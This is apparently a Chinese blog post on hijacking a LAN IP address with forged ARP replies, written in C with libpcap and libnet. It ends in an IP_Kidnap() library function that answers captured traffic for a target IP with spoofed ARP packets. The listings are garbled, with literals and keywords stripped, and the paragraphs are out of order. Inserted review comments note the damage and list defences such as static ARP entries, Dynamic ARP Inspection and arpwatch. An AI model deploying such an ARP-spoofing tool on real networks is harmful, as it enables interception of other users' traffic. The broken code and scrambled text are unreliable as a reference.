基于ARP的局域网IP劫持——C语言实现

图片 6

 

 

  我站在 烈烈风中

  恨不能 荡尽绵绵心痛


  望苍天 四方云动


  剑在手


  问天下谁是英雄


——《霸王别姬》


 

 

 
阅读这篇文章之前,请确认已经熟悉ARP报文伪造的方法,可参考《ARP数据包伪造》。
 

图片 1

/*
 * NOTE(review): this listing was damaged when the page was extracted. Type
 * keywords, string and numeric literals and most punctuation are missing, so
 * it does not compile as shown; compare with the original article.
 *
 * What the surviving fragments show: a libpcap capture program. It opens the
 * interface named by glNICStr with pcap_open_live(), installs the filter
 * expression glBpfCmd through pcap_compile() and pcap_setfilter(), and then
 * runs pcap_loop() with getPacket() as the per-packet callback. getPacket()
 * prints an incremented counter, fields of pkthdr and a ctime() timestamp,
 * then dumps the packet bytes in a loop.
 *
 * NOTE(review): the dump loop is bounded by pkthdr->len. libpcap only hands
 * the callback pkthdr->caplen captured bytes, so if the snapshot length
 * passed to pcap_open_live() (lost in this copy) is smaller than a frame the
 * loop would read past the captured data; bounding it by caplen avoids that.
 * NOTE(review): src_ip/src_mac/dst_ip/dst_mac are taken at fixed offsets
 * ("packet+", offsets lost); no length check before them is visible here.
 * Confirm against the original.
 */
#include <pcap.h> #include <time.h> #include
<stdlib.h> #include <stdio.h> unsigned glTargetIP[]={,,, *
glBpfCmd= unsigned
glRetargetMac[]={ ,,,,, *
glNICStr=
getPacket(u_char * arg, pcap_pkthdr * pkthdr, u_char * * id = ( * unsigned * src_ip = unsigned *
src_mac= unsigned * dst_ip =packet+ unsigned * dst_mac=packet+ printf(, ++(* printf(, pkthdr-> printf(, pkthdr-> printf(, ctime(( time_t *)&pkthdr->
(i=; i<pkthdr->len; ++
printf( ( (i + ) % == printf( printf( errBuf[PCAP_ERRBUF_SIZE], * devStr = printf( printf( exit( pcap_t * device = pcap_open_live(glNICStr, , ,
(! printf( exit(
pcap_compile( device,&filter,glBpfCmd,, pcap_setfilter(device ,& id = pcap_loop(device, -,
getPacket, (u_char*)& } View Code

图片 2

gcc name.c -lpcap -o name

  请看下图,这是全篇文章的鸟瞰:

  结合ARP报文伪造模块,下面给出完整实现代码:

图片 3

图片 4
/*
 * NOTE(review): this listing was damaged when the page was extracted. Type
 * keywords, literals, one header name ("<.h>") and several function names
 * are missing, so it does not compile as shown.
 *
 * What the surviving fragments show: the libpcap capture program combined
 * with libnet. ForgeAndSendArp() obtains a libnet handle (net_t) and tests
 * it ("net_t =="), fills an ARP header through a call whose name is lost
 * (arguments ARPHRD_ETHER, ETHERTYPE_IP, MAC_ADDR_LEN, IP_ADDR_LEN, arpOp
 * and the four address pointers; presumably libnet_build_arp), wraps it
 * with libnet_build_ethernet(..., ETHERTYPE_ARP, ...), and then runs a send
 * loop bounded by sendTimes. getPacket() calls ForgeAndSendArp() with
 * glNICStr and ARPOP_REPLY for each packet the filter delivers, then prints
 * the packet as before.
 *
 * Defensive context: the frames this produces are ARP replies generated in
 * reaction to captured traffic. On a monitored segment they appear as an IP
 * address changing its MAC binding, or as replies that do not come from the
 * address owner. Static ARP entries, switch-side Dynamic ARP Inspection and
 * arpwatch-style monitoring are the usual controls.
 *
 * NOTE(review): the hex-dump loop is bounded by pkthdr->len; the captured
 * byte count is pkthdr->caplen. Confirm the snapshot length in the original.
 */
#include <pcap.h> #include <time.h> #include
<stdlib.h> #include <stdio.h> #include <stdio.h>
#include <stdlib.h> #include <.h> #include <unistd.h> #include
<libnet.h> MAC_ADDR_LEN 6 IP_ADDR_LEN 4 unsigned glTargetIP[]={,,, *
glBpfCmd= unsigned
glRetargetMac[]={ ,,,,, *
glNICStr=
ForgeAndSendArp( * dev,unsigned * src_mac,unsigned
* unsigned *
src_ip,unsigned *dst_ip,uint16_t
arpOp,unsigned padPtr[ libnet_t *net_t = unsigned i= printf( printf( net_t = (net_t
== printf(
p_tag =
ARPHRD_ETHER, ETHERTYPE_IP, MAC_ADDR_LEN, IP_ADDR_LEN, arpOp,
(u_int8_t *)src_mac, (u_int8_t *)src_ip, (u_int8_t *)dst_mac, (u_int8_t *)dst_ip, padPtr,
, net_t, (- == printf( p_tag = libnet_build_ethernet( (u_int8_t
*)dst_mac, (u_int8_t
*)src_mac,
ETHERTYPE_ARP,
padPtr, , net_t, (- ==
printf( i= (;i<sendTimes;i++ (- == (res
= printf( getPacket(u_char * arg, pcap_pkthdr *
pkthdr, u_char * * id = ( * unsigned * src_ip =
unsigned * src_mac= unsigned
* dst_ip =packet+ unsigned *
dst_mac=packet+
ForgeAndSendArp(glNICStr,src_mac,dst_mac,src_ip,dst_ip,ARPOP_REPLY,
printf(, ++(*
printf(,
pkthdr-> printf(, pkthdr-> printf(, ctime(( time_t
*)&pkthdr-> (i=;
i<pkthdr->len; ++ printf( (
(i + ) % == printf( printf(
errBuf[PCAP_ERRBUF_SIZE], *
devStr =
printf( printf( exit(
pcap_t * device =
pcap_open_live(glNICStr, , , (! printf( exit(
pcap_compile( device,&filter,glBpfCmd,, pcap_setfilter(device ,& id = pcap_loop(device, -,
getPacket, (u_char*)& } View Code

图片 5 
要想实现上图的工作流程,必须实现两个模块:

 这个工具的验证结果已经在文章鸟瞰图中给出。从防御角度看,这类伪造的ARP应答表现为同一IP对应的MAC地址发生变化,可以通过静态ARP绑定、交换机的动态ARP检测(DAI)或arpwatch一类的监控工具来发现和阻断。

    •自由的伪造ARP报文

 下面,我们将这段代码封装成为一个共享库,以供其他程序调用。 

    •抓取并分析所有流经网卡的数据包

 /*
  * NOTE(review): this listing was damaged when the page was extracted. Type
  * keywords, literals, one header name ("<.h>") and several function names
  * are missing, so it does not compile as shown.
  *
  * What the surviving fragments show: the capture-and-reply logic packaged
  * behind one entry point. IP_Kidnap() takes TargetIP, RetargetMac,
  * sendNICStr and further parameters whose names are lost, assigns the
  * globals glTargetIP, glBpfCmd, glRetargetMac, glSendNICStr and
  * glListenNICStr, opens glListenNICStr with pcap_open_live(), installs
  * glBpfCmd via pcap_compile() and pcap_setfilter(), and enters pcap_loop()
  * with getPacket() as the callback. getPacket() calls ForgeAndSendArp() with
  * glSendNICStr and ARPOP_REPLY for each delivered packet; ForgeAndSendArp()
  * builds the ARP and Ethernet headers with libnet and runs a send loop
  * bounded by sendTimes.
  *
  * Defensive context: the frames this produces are ARP replies generated in
  * reaction to captured traffic. On a monitored segment they appear as an IP
  * address changing its MAC binding. Static ARP entries, switch-side Dynamic
  * ARP Inspection and arpwatch-style monitoring are the usual controls.
  *
  * NOTE(review): the hex-dump loop is bounded by pkthdr->len; the captured
  * byte count is pkthdr->caplen. Confirm the snapshot length in the original.
  */
 #include <pcap.h>
 #include <time.h>
 #include <stdlib.h>
 #include <stdio.h>

 #include <stdio.h>
 #include <stdlib.h>
 #include <.h>
 #include <unistd.h>
 #include <libnet.h>

  MAC_ADDR_LEN 6
  IP_ADDR_LEN 4


  unsigned  *   *  unsigned  *   *   * 

  ForgeAndSendArp( * dev,unsigned  * src_mac,unsigned  *     unsigned   * src_ip,unsigned  *dst_ip,uint16_t arpOp,unsigned              padPtr[          libnet_t *net_t =                     unsigned  i=  
          printf(          printf(          
          net_t  =          (net_t ==                   printf(                      
          p_tag =                          ARPHRD_ETHER,
                          ETHERTYPE_IP,
                          MAC_ADDR_LEN,
                          IP_ADDR_LEN,
                          arpOp,
                          (u_int8_t *)src_mac,
                          (u_int8_t *)src_ip,
                          (u_int8_t *)dst_mac,
                          (u_int8_t *)dst_ip,
                          padPtr,
                          ,
                          net_t,


          (- ==                   printf(                       
          p_tag = libnet_build_ethernet(
                          (u_int8_t *)dst_mac,
                          (u_int8_t *)src_mac,
                          ETHERTYPE_ARP,
                         padPtr,
                         ,
                          net_t,


          (- ==                   printf(                               
                    i=          (;i<sendTimes;i++            (- == (res =                   printf(                               
                                     getPacket(u_char * arg,   pcap_pkthdr * pkthdr,  u_char *     * id = ( *   unsigned  * src_ip =   unsigned  * src_mac=   unsigned  * dst_ip =packet+   unsigned  * dst_mac=packet+   
   ForgeAndSendArp(glSendNICStr,src_mac,dst_mac,src_ip,dst_ip,ARPOP_REPLY, 
   printf(, ++(*   printf(, pkthdr->   printf(, pkthdr->   printf(, ctime(( time_t *)&pkthdr->   
      (i=; i<pkthdr->len; ++      printf(     ( (i + ) %  ==         printf(     
   printf(  

  IP_Kidnap ( unsigned  * TargetIP, *           unsigned  * RetargetMac, * sendNICStr , *     errBuf[PCAP_ERRBUF_SIZE], *      glTargetIP=   glBpfCmd=   glRetargetMac=   glSendNICStr=   glListenNICStr= 

   devStr =   
         printf(    
      printf(     exit(    

   pcap_t * device = pcap_open_live(glListenNICStr, , ,    
   (!      printf(     exit(    
   pcap_compile( device,&filter,glBpfCmd,,   pcap_setfilter(device ,&   
    id =    pcap_loop(device, -, getPacket, (u_char*)&   

     }

图片 6

  编译后的结果:

 
从上图中可以看出,我们可以通过BPF或者DLPI层实现数据包的抓取分析,而tcpdump的根基——libpcap库,正是对BPF层进行二次封装而实现的C库,我们将通过它来实现数据包的抓取分析。需要注意,使用libpcap打开网卡抓包通常需要root权限(在Linux上也可以只授予CAP_NET_RAW能力)。

ForgeAndSendArp( *
dev,unsigned * src_mac,unsigned * * src_ip,unsigned
*dst_ip,uint16_t arpOp,unsigned

  关于libpcap的基础使用,请参考这篇文章《libpcap使用》。 

 IP_Kidnap ( unsigned  * TargetIP, * * RetargetMac , * listenNICStr , *

  下面给出一个简单的libpcap过滤抓包的程序:

 
